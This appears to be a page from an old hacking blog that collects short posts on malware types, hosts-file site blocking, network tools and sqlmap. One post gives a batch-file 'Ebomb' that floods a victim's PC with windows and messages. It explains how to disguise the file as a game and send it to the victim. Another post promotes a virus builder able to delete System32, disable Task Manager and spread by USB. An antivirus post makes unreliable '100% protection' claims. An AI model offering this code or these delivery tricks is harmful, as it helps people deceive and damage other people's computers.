PC Security Threats | Malwares

Computer security threats or Malicious code or Malwares comes in a wide variety of forms and is distributed through an ever growing number of delivery mechanisms. In general malicious program is any software that impedes the normal operation of a computer or networking device. This software most often executes without the user's consent. 

Understanding how malwares works can help you develop defensive strategies, select 
computer security products and train employees on how to identify potential threats.

Types of computer security threats

These can be roughly broken down into types according to the malware's method of  operation. Anti-"virus" software, despite its name, is able to detect all of these types of malware. There are  following malware types.

• E-mail and other types of viruses
• Trojans and other backdoors
• Worms
• Blended threats
• Time bombs
• Spyware
• Adware
• Stealware
• Zombies

when a piece of malicious code starts infecting large number of computers, it is said to be 'in wild'.

Threat level of these malwares refers to it's potential to spread and infect computers. Threat level can be shown in 4 catagories.

1. NO -  may not function well
2. Low - requires human assistance in replicating and moving from computer to computer
3.  Medium - slow infection speed and little damage
4.  High - great infection speed and do considerable damage.

wild list  or threat list refers to malicious code that is wandering around the internet infecting computers. An archive of wild lists and information about the organisation that maintains the list are available at www.wildlist.org

Read More

Make Virus using V-Maker.

Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker



Main Feature of V-Maker


You can create your own prank files/viruses with ease by V-Maker.

1. Disable Mouse and Keyboard
2. Disable Regedit
3. Delete System32
4. Block Site
5. Disable Task Manager
6. Take Screen Shot Of Victim  PC
7. Message Box (When User Click on Virus)
8. Automatically Download Start (When User click on virus download start automatic)
9. USB Spread

Download V-Maker

Read More

Block any website on your computer.

There are many people who want some website unaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.

Steps:

1- go to C:\WINDOWS\system32\drivers\etc
2- Find a file named "HOSTS"
3- Open this file in notepad
4- Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessable.

you can add as many url of websites under this by increasing last no. of ip 

as

127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com

an so on.

To unblock these website only erase the line corresponding to that website.

Read More

Make a Ebomb(a virus)

 

Ebomb a virus for fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox

and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)


you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad

and then simply save it as "anyname.bat"

Read More

Download Advanced IP Scanner

Advanced IP Scanner 2.0 Portable | 10.2 MB

Advanced IP Scanner is a fast LAN scanner for Windows. It is very easy to use and give you various types of information about local network computers in a few seconds. It gives you one-click access to many useful functions – remote shutdown and wake up, Radmin integration and more! Powered with multi-thread scan technology, this program can scan hundreds computers per second, allowing you to scan ‘C’ or even ‘B’ class network even from your modem connection.


Features of Advanced IP Scanner:
· Fast and stable multi-threaded IP scanning: You can scan hundreds of IP addresses simultaneously and with great speed – on Pentium-based machines Advanced IP Scanner scans class “B” and “C” networks in a few seconds! You can configure Advanced IP Scanner to scan in many priority levels, set number of maximum threads and so on.
· Remote shutdown: This shuts down any remote machine with NT or Win2k operating system. You can use your default access rights or specify login and password to shutdown.
· Wake-On-LAN: You can wake any machine remotely, if “Wake-on-LAN” feature is supported by your network card.
· Group operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
· Lists of computers saving and loading: This enables you to perform operations with a specific list of computers. No problems – just save a list of machines you need and Advanced IP Scanner will load it at start up automatically.
· Radmin integration: This enables you to connect via Radmin (if it’s installed) to remote computers with just one click.

Download Advanced IP Scanner 2.0

Read More

How to protect your system from USB viruses

Autorun Virus Remover can detect and clean hundreds of usb/autorun viruses and it will block viruses and trojans trying to attack when USB device is inserted. Autorun Virus Remover provides 100% protection against any malicious programs trying to attack via USB storage(USB drive?USB stick?pen drive?flash drive?flash card?secure digital card?removable storage?portable storage?ipod?media player).

Compare Autorun Virus Remover with other antivirus solutions, you will find out its highlights: Autorun Virus Remover provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. Autorun Virus Remover can detect and clean the usb virus/worm/trojan such as Ravmon,auto.exe in your computer or usb drive,it could solve the problem that unable to open a drive by double clicking. It also removes the leftovers of virus by removing the autorun.inf files and cleaning up your system registry, so you won’t see the autoplay item anymore


Download Autorun virus Remover

Read More

SQLMAP-Automatic SQL Injection Tool

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on theoperating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..



You Can download sqlmap 0.7 here:
Windows Portable: sqlmap-0.7_exe.zip


Enjoy !

Read More

Trace the location with IP

Do you want to know where your Internet visitors are coming from? Which country? Which state? Which city? Which ISP? Which domain name? Which connection type? Which ZIP code?

IP2Location™ is a geo IP solution to help you to identify visitor's geographical location, i.e. country, region, city, latitude, longitude, ZIP code, time zone, connection speed, ISP and domain name, IDD country code, area code, weather station code and name using a proprietary IP address lookup database and technology without invading the Internet user's privacy.

Just go to http://www.ip2location.com/?rid=939 and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.

1. Country in which the IP is located

2. Region

3. City

4. Latitude/Longitude

5. Zip Code

6. Time Zone

7. Name of the ISP

8. Internet Speed

9. Weather Station

10. Area Code and

11. Domain name associated with the IP address.

Read More

Network Monitoring, Packet Sniffing and Analysis

Hello Friends,AthTek NetWalk Personal Edition is a robust application to help in the administration of all kinds of networks. It is particularly useful for new network administrators who wish to gain in depth knowledge about network infrastructure and management. AthTek NetWalk contains graphical representations of the network with the use of advanced packet sniffing, to help project the network state in statistical and graphical format.

After installation, you will be prompted to select a network adapter to view stats from. You can also enable capturing packets in promiscuous mode by checking the relevant checkbox. Chose an adapter and hit Ok.



This will represent the overview of the network stats in a graphical user interface. This includes a monitoring dashboard, top MAC hosts pie chart, top IP hosts chart, and layered summary of application, net/transport and physical layers.

You can either click on any of the categories of the layered summary of application, net/transport and physical layers or select the Layered View option from the top left corner of the main interface (below the Overview tab below Monitoring). The layered view can be utilized to view information regarding DNS name resolution, HTTP – World Wide Web, QQ – Technet IM, ICMP Analysis, MAC hosts, VLAN, SMTP, Telnet and much more.

You can also chose the Events option below layered View to analyze network integrity and see a map of the network via the Matrix Map option (below Events).

To see a graphical representation of the network state click on the Graphs tab (below Matrix Map). From here, you can view current utilization, application layer protocol packets, ping requests and replies, TCP vs UDP, ARP requests and replies, broadcast vs multicast total, DNS (successful and failed queries), packet sizE.
AthTek NetWalk is a comprehensive network infrastructure analysis tool which helps in managing, maintaining and troubleshooting all kinds of networks. It works on Windows XP, Windows Vista, Windows 7 and Windows Server 2008.

Download AthTek NetWalk Personal Edition (Free Edition)


Enjoy !

Read More